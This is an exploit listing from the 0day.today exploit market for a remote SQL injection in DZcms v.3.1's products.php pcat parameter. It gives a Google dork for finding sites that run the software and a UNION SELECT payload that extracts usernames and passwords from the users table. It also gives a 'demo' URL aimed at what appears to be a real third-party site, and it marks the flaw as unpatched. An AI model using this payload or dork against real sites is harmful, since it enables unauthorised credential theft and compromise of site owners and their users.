[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability

Author
Glafkos Charalambous
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4631
Category
web applications
Date add
11-01-2009
Platform
unsorted
==================================================================
DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability
==================================================================


Application: DZcms v.3.1
Vendor Name: CyDezines
Bug Type: dzCMS SQL Injection Vulnerability
Exploitation: Remote
Severity: High
Solution Status: Unpatched
Google Dork: "Powered by DZcms"

POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Demo:
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Credits: Glafkos Charalambous



#  0day.today [2024-12-25]  #